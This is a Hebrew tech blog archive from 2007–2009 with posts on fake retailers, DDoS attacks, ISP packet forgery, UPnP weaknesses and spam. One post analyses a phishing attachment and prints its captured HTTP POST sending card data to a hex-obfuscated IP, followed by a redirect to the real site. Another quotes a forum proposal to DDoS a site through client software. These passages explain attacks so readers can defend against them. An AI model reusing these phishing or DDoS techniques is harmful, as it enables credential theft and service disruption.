המלחמה ברשת – מחשבות, מחשבים, ושאר דברי בלע

24/09/200924/09/2009

פרסום כוזב במסמכי בלוג

לפני כמה ימים קיבלתי תגובה לפוסט על דיל-אקסטרים וזו לשונה:

יש אתר ישראלי לחברה האלה
www.dealextreme.co.il
אתר פצצה מחירים זולים במיוחד והכי חשוב זה דרך ויזה רגילה
ותמיכה בעיברית

וורדפרס חדש בתגובה וביקש שאני אאשר שהיא לא ספאם, ומסתבר שעם סיבה טובה.
בבדיקה באתר, נראה כאילו חוץ מהשם – אין קשר בינו לבין האתר האמיתי של DealExtereme.
שלחתי למגיב אימייל שמבקש שיסביר אם יש קשר בין האתרים, כמובן שהוא לא ענה.
לדעתי מדובר בחבורת חובבנים שמנסה לרכוב על ההצלחה של דיל אקסטרים.
מעבר לזה שהמחירים שלהם לא אטרקטיביים, הם מפרסמים תגובות בבלוגים ובפורומים (פה ופה) שמהם נובע שהם הסניף הישראלי של DX.
במילים אחרות, מתחזים שקרנים.
לא הייתי קונה מהם מסטיק משומש.

07/08/200907/08/2009

הרוסים באים

אודה ולא אבוש, אחד הדברים הראשונים שאמרתי למי שהיה לידי כשפייסבוק וטוויטר היו שניהם תחת מתקפת DOS מבוזרת היה שזה או הרוסים או הסינים.
נראה שצדקתי, ואלו היו הרוסים שהחליטו לסתום את הפה לאיזה גאורגי אחד המכונה Cyxymu שהשתמש בהם ובלייב ז'ורנל כדי לפרסם את דעתו על המצב בין רוסיה לגיאורגיה.

קם לו איזה סטאלין קטן, ואומר לפיקודיו: תפסיקו את המנוול הזה בכל מחיר! פרסטרויקה!
פיקודיו היקרים מוציאים את הבוטנט שלהם מהבויידעם, ופשוט מתקיפים אתרים שמליוני אנשים משתמשים בהם.
שורה תחתונה:
עכשיו הרבה יותר אנשים מסמפטים את הקורבן הברור פה – גאורגיה, ושונאים את האוייב הרשע, רוסיה – שלא מהסס להכות להם בטוויטר ובפייסבוק.

סחתיין עליך, יא מיני-סטאלין.

01/04/200901/04/2009

מי שמשחק בחרא

מי שמשחק בחרא, שלא יתפלא אם מחרבנים עליו.
http://firefang.net/blog/756/comment-page-1#comment-7848

02/04/200802/04/2008

טכניקת פישינג חדשה – New phishing technique

English translation below.

דייגי זהות המציאו שיטה חדשה שמסתירה בצורה טובה מאוד ממשתמש לא טכנולוגי את המהות של מה שקורה.
בניגוד לדרך המקובלת, בה המשתמש מופנה לאתר של הפישרים, שנראה כמו האתר האמיתי (Paypal, Bank of america וכדומה) – בשיטה החדשה זה מה שקורה:

1. המשתמש מקבל אימייל שנראה כאילו הגיע ממקור אמיתי (במקרה שלי מחברה בשם Moneybookers, שדי דומה לPaypal), האימייל טוען שמסיבות אבטחה ההודעה בקובץ מצורף:

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.
————————————————-
© Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.

2. הקובץ המצורף הוא קובץ HTML רגיל לחלוטין, שלא מכיל שום דבר שיהיה קל לזהות בסריקה אוטומטית (היוריסטית), ונראה כמו דף רשמי של Moneybookers,
שמטרתו למנוע גניבת זהות, וכיבוס כספים. מטרות ראויות ללא ספק, מה שעוזר להוריד את ההגנות הפסיכולוגיות של המשתמש שרוצה לעזור.

הדף מקשר ללוגואים וקבצים מהאתר של Moneybookers, מה שמעלה את רמת האמינות הויזואלית שלו.

3. ברגע שהמשתמש ממלא את הפרטים ולוחץ על submit, הנתונים נשלחים לשרת של של הנוכלים, ששומר אותם ומחזיר HTTP 302, שמפנה לשרת של MoneyBookers:

POST /recordings/theme/images/verification.pl.php HTTP/1.1
Host: 0x9f.0xe2.0x3a.0x88
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Iceweasel/2.0.0.12 (Debian-2.0.0.12-1)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

day=02&month=Jan&year=1912&cvv=44324&txtEmail=44&txtPassword=&txtTuring=

HTTP/1.1 302 Found
Date: Wed, 02 Apr 2008 04:13:22 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.11
Location: https://www.moneybookers.com/app/help.pl?s=laundering
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

יש כמה דברים שכדאי לשים אליהם לב (מודגשים).
* הכתובת של שרת היעד היא 0x9f.0xe2.0x3a.0x88. הדבר המוזר הזה הוא כתובת IP במסווה, מה שמקשה על המשתמשים לזהות מה קורה פה.
* התשובה היא HTTP 302, שמפנה לשרת המאובטח של MoneyBookers, מה שגורם למשתמש לחשוב שלשם הוא הגיע כשהוא לחץ על Submit.

זדוני.
הבעיה פה היא שאי אפשר למנוע מהמשתמשים להריץ קובץ HTML מקומי, ומכיוון שהמשתמשים לא ידעו שעבדו עליהם לא יהיו הרבה דיווחים על העניין, וגם אם יהיו רובם לא ישכילו להבין על מי להתלונן. ולכן כלים אוטומטים כמו זיהוי זיוף רשת של דפדפנים – שמתבסס על שרת מרכזי שאוסף תלונות מהרבה משתמשים – לא יעבדו כמו שצריך כי לא יהיו הרבה תלונות.

========== ENGLISH TRANSLATION ==========

Phishers have come up with a new method to conceal well from non-technical users the essence of what's happening.
Unlike the usual approach, where the user is pointed to a site owned by the phisher, that looks like the original site (Paypal, Bank of America etc) – this is what really happens with this approach:
1. The user receives an email that looks like it came from a real source (in my case from a Paypal like company called MoneyBookers), and that for security reason the real message is attached:

2. The attached HTML is a normal HTML file that does not contain anything that will be easy to detect in an automatic (heuristic) scan, and looks like an official MoneyBookers page that is supposed to help prevent identity theft and money laundering. worthy causes with no doubt – that help lower the user mental defenses that wants to help.

The page links to logos and files from MoneyBookers, a thing which increase it's visual reliability level.

3. When the user fills up the details and hit submit, the data is posted to the crooks site, which stores them and return HTTP 302, which redirect the user to the MoneyBookers site.

day=02&month=Jan&year=1912&cvv=44324&txtEmail=44&txtPassword=&txtTuring=

A few things to pay attention to (in bold):
* The destination post address is 0x9f.0xe2.0x3a.0x88, which is an IP address in disguise.
* The user is redirected to the real secure MoneyBookers site, which makes him think this is where he have sent his data.

Nasty.
The problem is that you can't prevent the user from running local HTML file, and since the users will not know they have been fooled there will not be many reports about this. that's why automatic tools like browser web forgery detection – that are based on a central server that collects complaints from many users – will not work well because there will not be many complaints.

26/02/200826/02/2008

Shareaza.com, המחטף

לפעמים המציאות עולה על כל דמיון.
חברת דיסקורדיה, שמקושרת למקבילה הצרפתית של RIAA (ארגון חברות ההקלטות האמריקאי) השתלטה בדרך לא ברורה על הדומיין של תוכנת שיתוף הקבצים שראזה והחלה להתחזות לצוות הפיתוח המקורי, תוך שהם משתמשים בלוגו של הפרוייקט ומציעים גרסא "מטופלת" של הקוד של הפרוייקט.
נראה שמדובר בהפרה בוטה של זכויות היוצרים של התוכנה, של הGPL ושל זכויות השימוש בלוגו של התוכנה.
משתמשים מעוצבנים הציעו בפורומים של האתר החדש לשנות את התוכנה כל שתתקוף את האתר המתחזה בבקשות HTTP (מתקפת DDOS – שלילת
שרות מבוזרת).

Make it so the real shareaza program queries their site [shareaza.com] every couple of seconds. As an individual user this won’t take much personal bandwidth. But all shareaza users worldwide put together should be enough to kill their server and they won’t really be able to do much since it will be coming from so many different IPs.

עורכי הדין של החברה הגיבו ואיימו משפטית על מנהלי הפורום וכל כל מי שיפתח מתקפת שלילת שרות כזו (אני מעריך את מאמץ הפיתוח הנדרש בכחמש דקות כולל בדיקות QA מקיפות).

This law firm represents Discordia, Ltd., the operator of the website Shareaza.com and owner of the rights in the Shareaza branded software distributed from that domain. Please be advised, that your forum contains a string of posts under the title: “suggestion to kill Shareaza.com.” Under the string, the poster, RedSquirrel offers directions for users of Shareaza software to implement a DoS that would have the effect of destroying or seriously impairing our client’s application and network. The poster OldDeath also offers a manner to illegally attack our client’s business.

Despite whatever complaints your forum’s users may have with our client’s proper and legal business activities, the type of activity promoted on your forum is illegal. Therefore, we request that you immediately remove this string of posts and any future strings of this nature. My client respects your users’ rights to express their points of view. However, the line is crossed when users begin to promote the destruction of a legitimate business (evidently based on out some misguided belief that artists and others who create music should not be fairly compensated for their efforts) via illegal or other predatory means.

If the above cited illegal activity on your site does not immediately cease and desist, our client will take all necessary action to vigorously and relentlessly protect its rights. To be clear, if this action is not immediately taken and, as result, our client’s business is harmed, we will not only pursue, locate and hold fully responsible each and every one of those who have implemented this, or any similar DoS, but also those responsible for maintaining your site and the forums.

Please confirm that the requested action is being taken immediately.

Jeffrey A. Kimmel

Meister Seelig & Fein, LLP
140 E. 45th St., 19th Fl.
New York, NY 10017
(212) 655-3578

מי שיכנס כרגע עם פיירפוקס לאתר החטוף יגלה שפיירפוקס מזהיר אותו מפני חשד לאתר מזויף.
זה תוצאה ישירה של מאמץ נוסף שמאורגן בפורום להתלונן על האתר המזוייף בגוגל, שבינתיים הצליח להכניס אותו לרשימת האתרים החשודים.

הסיפור המלא כאן.

25/01/200825/01/2008

012 וTorrentLeech

012 סמייל קווי זהב (או איך שלא קוראים להם היום), שנולדו מהרכישה של 012 על ידי אינטרנט זהב נחשדים בזיוף של תעבורה אינטרנט שנועדה לגרום להחרמה של משתמשי TorrentLeech.
בעבר היו לי לא מעט בעיות מהירות עם אינטרנט זהב שהסתיימו כשהתנתקתי מהם.
כבר בעבר חשדתי שאינטרנט זהב משתמשת בטכניקות מסויימות כדי לפגוע בקצב ההעלאה של משתמשים, ואם הטענות של מנהלי TorrentLeech נכונות, אז 012 סמייל קווי זהב (או איך שלא קוראים להם היום) עברו את הגבול הדק שבין ניהול משאבים על גבול הלגיטימי לזיוף נתונים כדי להפיק רווחים, פעולה פלילית ללא ספק.
יש דמיון עקרוני רב בין המקרה של Comcast, שזייפו חבילות RST שנועדו לגרום לצד השני לחשוב שהצד המחובר סגר את החיבור לבין מה שסמייל קווי זהב (או איך שלא קוראים להם היום) נחשדים בו.
הייתי אומר שהפתרון של Comcast יותר מתוחכם טכנולוגית ויותר קשה לזיהוי ושהפתרון של 012 (או איך בלה בלה) יותר גס טכנולוגית אבל יותר נבזי בהרבה.
הסיבה היא שהפתרון של 012 (בלה) נועד לגרום לשרתי TorrentLeech לחשוד שהמשתמש מנסה לגרום לאתר לחשוב שהוא העלה כמויות נתונים גדולות ולא סבירות במטרה לגרום להחרמתו מהאתר.
זו מתקפה מאוד ספציפית על משתמשי TorrentLeech, ואם זה אכן קרה, אני מצפה שכל משתמשי TorrentLeech שמחוברים דרך 012 (בלה) יתנתקו ויעברו לספק שלא חוסם/מגביל/מרמה/משקר/עובר על החוק (עדיין?) כמו בזק-בין-לאומי.

הערה:
הטענה של TorrentLeech לא הוכחה עדיין.

הנה ההודעה המקורית של TorrentLeech:

2008-01-24 – ISRAEL USERS

Unfortunately it seems, that a few Israeli ISPs, are intensionally altering the announces to our tracker of their clients, announcing to our tracker false stats (over 8.000.000 TB of upload and download) in order for these users to be probably banned (and save some bandwidth). We made a script to automatically detect this false announce, and reset the user's account (reset uploaded/downloaded). Although this is NOT a fix, only a temporary solution, we cannot do anything more from our part, since this is not a problem of our tracker. We know that reseting these accounts is not pleasant, but the other alternatives were to ban these accounts or to ban all the Israel Golden Lines ip block (which unfortunately seems very possible in the future, since our tracker gets hammered because of the problem above)
Seems most of the users having this problem use the ISP-> GOLDENLINES

16/01/200816/01/2008

חור אבטחה מובנה בUPNP

UPNP היא טכנולוגיה שנועדה לפשט את התהליך של הוספת שרתים ונקודות קצה לרשת. אחד השימושים הפופולריים של UPNP הוא לאפשר קידום פורטים אוטומטי.
נניח שיש לכם רשת מקומית קטנה מאחורי NAT (תצורה מאוד נפוצה בימינו, כמעט כל מחשב שמחובר לאינטרנט דרך נתב מהווה בעצם רשת מקומית כזו), ותוכנת שיתוף באחד המחשבים רוצה לאפשר התחברות אליה מבחוץ.
לפני UPNP, התוכנה לא תוכל לעשות את זה בעצמה, ומנהל המערכת (או המשתמש התמים שקנה את הנתב) יצטרך להגדיר את הנתב "ולפתוח פורטים", או ליתר דיוק – לקדם פורטים מסויימים אל המכונה הספציפית.
היום רוב הנתבים תומכים בUPNP, מה שמאפשר לתוכנת השיתוף למצוא את הנתב, לגלות שהוא תומך בקידום פורטים, ולבקש ממנו בדרכי נועם לקדם למחשב עליו היא רצה חבילות מידע שמגיעות לפורטים מסויימים.
מאוד נוח, הכל פשוט עובד.
הבעיה היא שUPNP לא כולל אימות (כי אחרת המשתמש היה צריך להגדיר שם משתמש וסיסמא בנתב לצרכים האלו, ולתת לתוכנת השיתוף את שם המשתמש והסיסמא, דבר לא נוח בעליל!) ולמעשה מאפשר לכל תוכנה שרצה של מחשב בתוך הרשת לבקש קידום פורטים בלי בקרה מיוחדת ובצורה שקופה ונסתרת מהמשתמש.

הבעיה מתחילה כהמשתמש מריץ תוכנה בלי להבין אפילו שזה מה שהוא עושה.
למשל, אתם גולשים לתומכם באינטרנט, בטוחים שהתוכנה היחידה שאתם מפעילים היא הדפדפן, אתם נכנסים לדף כלשהו שמציג אנימציית פלאש.
הופ, הרצתם תוכנה חיצונית.
לא הפלאש, אלא האנימציה עצמה.
בצורה דומה הפעלה של ישומון ג'אווה היא בעצם הפעלה של תוכנה חיצונית בתוך הרשת שלהם. במקרה של ג'אווה המצב עוד יחסית בסדר כי רק ישומונים חתומים יכולים להתחבר לשרתים אחרים מזה שהם ירדו ממנו (ישומים חתומים הם נדירים למדי כי כדי לחתום יש לרכוש חתימה מסמכות שורש כמו Verisign או Thawte, מה שעולה כמה מאות דולרים לשנה ויאפשר זיהוי של מקור הקוד).
לעניין, פלאש מאפשר התחברות לנתב ובקשה לקידום פורטים, בנוסף UPNP מאפשר בנתבים מסויימים לשנות את שרת הDNS של הנתב, מה שיכול לאפשר תכמון של המשתמש ברמות בלתי נתפסות.

מכיוון שכל נתב שנרכש בשנים האחרונות מתהדר בתמיכה בUPNP שמופעלת בדרך כלל כברירת מחדל, הבעיה די חמורה.
מומחי אבטחה מנסים לשכנע אנשים מזה שנים שנתב NAT הוא לא Firewall, אבל רוב האנשים לא מבחינים בהבדל. מבחינתם אם הם מאחורי נתב הם בטוחים והנתב הוא זה שיספוג את ההתקפות.

אז זהו, שלא.
למעשה, ווקטור ההתקפה הזה מנצל את האמון שאנחנו רוכשים למחשבים בתוך הרשת.
למשל, שרותים מקומים רבים מאפשרים התחברות מהמחשב המקומי בלבד (ובודקים שההתחברות מגיעה מהמחשב המקומי). הפעלת פלאש תמימה (ונסתרת) יכולה לעקוף את ההגנה הזו בקלילות (ואם פלאש עדיין לא תומך בקישוריות UDP/TCP, הוא בטח יתמוך בגרסאות הבאות).

מומלץ לנטרל את התמיכה בUPNP בנתב שלכם.

ההתקפה הודגמה בGnuCitizen.

20/10/200723/10/2007

The great firewall of Comcast

ספק האינטרנט השני בגודלו בארצות הברית – Comcast, חוסם בצורה פעילה תקשורת ביט-טורנט.
החסימה מתרחשת בטכניקה דומה לזו של חומת האש הסינית, כלומר – קומקאסט מזייפים חבילות מידע שמשמשת לניתוק חיבור TCP (עם דגל RST דלוק) מכל אחד מהצדדים, וגורמים לשני הצדדים לחשוב שהצד השני רוצה לסגור את הקשר.
הניתוק מתבצע ברגע שהם מזהים שאחד הצדדים מציע קובץ שלם להורדה (Seed), ואין ספק שהוא פוגע באיכות השירות של משתמשי הפרוטוקול בקומקאסט.
למותר לציין שהחסימה פוגעת גם במשתמשים שעושים שימושים לגיטימיים בפרוטוקול, כמו הפצה של תוכן חוקי (למשל מפיק שרוצה להפיץ את הסרט החדש שלו בביט-טורנט תוך שימוש בחיבור של קומקאסט) , הפצת לינוקס וכדומה.
אפשר להתגבר על החסימה באמצעות הצפנה של התקשורת (כל לקוח ביט-טורנט מודרני תומך בזה), מה שיקשה על קומקאסט לזהות שמדובר בתעבורת ביט-טורנט, אבל לא ימנע מהם לשלוח חבילות RST מכיוון שמעטפת הIP עדיין לא מוצפנת.

אפשר לראות איך נוצרת פה ברית טכנולוגית בין גורמים שמטרתם, כל אחד מסיבותיו, לשלוט בתעבורת המידע ברשת, ומנגד – איך הטכנולוגיה שמאפשרת למידע להשאר חופשי מתחזקת בעקבות כך.

13/10/2007

מיקרוספאם

מזה מספר חודשים אני רואה בפיירסטטס של firestats.cc זרימה הולכת וגוברת הפניות חיפוש ממנוע החיפוש של מיקרוסופט:

מסתבר שההפניות, שמכילות UserAgent מזוייף ודף מפנה מזוייף (עם מילות חיפוש שלא באמת מובילות אלי), יוצאות – תאמינו או לא – משרתי מייקרוסופט.
יש שני טווחי כתובות IP שמהן יוצאות הבקשות:

65.55.165.*
131.107.151.*

מסתבר שאני לא היחיד שזה הרגיז אותו. תגובת מייקרוסופט על פי הודעה בפורום שקישרתי אליו:

Second, we want to explain what this is all about. The traffic you are seeing is part of a quality check we run on selected pages. While we work on
addressing your conerns, we would request that you do not actively block the IP addreses used by this quality check; blocking these IP addresses could prevent your site from being included in the Live Search index.

אז מייקרוסופט מודים שזה הם (כאילו הם יכלו להסתתר באמת), וטוענים – תחזיקו – שהם עושים לדפים נבחרים בדיקת איכות!
ואו, הרבה תודה מייקרוסופט, עכשיו שבדקתם את איכות הדפים שלי (תודה תודה!), אתם מוכנים (תודה!) להפסיק לזבל לי את הסטטיסטיקות בצואה דיגיטלית?
(הממ, צואה דיגיטלית = דואה?)
מה שיפה זה שהם טוענים שאם תחסמו את כתובות הIP האלו, אתם עלולים לא להיות מאונדקסים על ידי הזחלנים של מנוע החיפוש של מייקרוסופט.
אכן טרגדיה, הרי אני מקבל כל כך הרבה הפניות משם שפשוט חבל לחסום אותו, כהוכחה – ראו את התמונה המצורפת למעלה, כמעט כל ההפניות מLive!

אגב, ניתן לזהות בקלות שאלו הפניות מאותה חווה גם על פי הדף המפנה, שמכיל תמיד את המילה LIVOP, למשל:

http://search.live.com/results.aspx?q=custom&mrt=en-us&FORM=LIVSOP

נראה שהתעלמות מטווח של כתובות IP יהיה אחד הפיצ'רים של הגרסא הבאה של פיירסטטס.

מייקרוספט, אני באמת מציע לכם לתפוס את הגאון שיזם את המהלך הזה ולקדם אותו, אסור לו לגעת במחשבים!

02/10/200702/10/2007

נקמה מתוקה וקרה

זוכרים שקיבלתי בוקר בהיר אחד 230 כרטיסי ברכה מאיזה ספאמר באתר של פיירסטטס?
זוכרים שהלשנתי עליו לICANN שפרטי הWho is שלו היו שגויים?
אני שכחתי, אז הנה תזכורת.
הפניה המקורית:

Errors in Technical Contact Information:
Address:INCORRECT
Description:
missing information

Explanation:
Site advertise in using spam bots, I received over 200 spam tickets in my trac system at http://firestats.cc (my site) that advertise this site last night.
Please delete the site.

היום בבוקר קיבלתי מICANN אימייל שמבקש שאני אבדוק אם הפרטים תוקנו (אני מניח שאין להם כוח אדם לבדוק בעצמם).
הנתונים אומרים שהתאר מושעה בגלל נתונים שגויים, והאתר מת, אז נראה שהספאמר לא טרח לתקן.
אני יודע שלספאמרים יש אתרים כמו בוטנים, וזה שלא ממש מזיז להם, אבל אני מרוצה כי הצלחתי בכמה דקות עבודה לסגור לחולרע את האתר.
רוצים גם?
תמצאו פרט חסר או שגוי בפרטי הWhois של האתר ודווחו עליו פה, וגלגלי הצדק האיטיים אך העיקשים יתחילו להסתובב.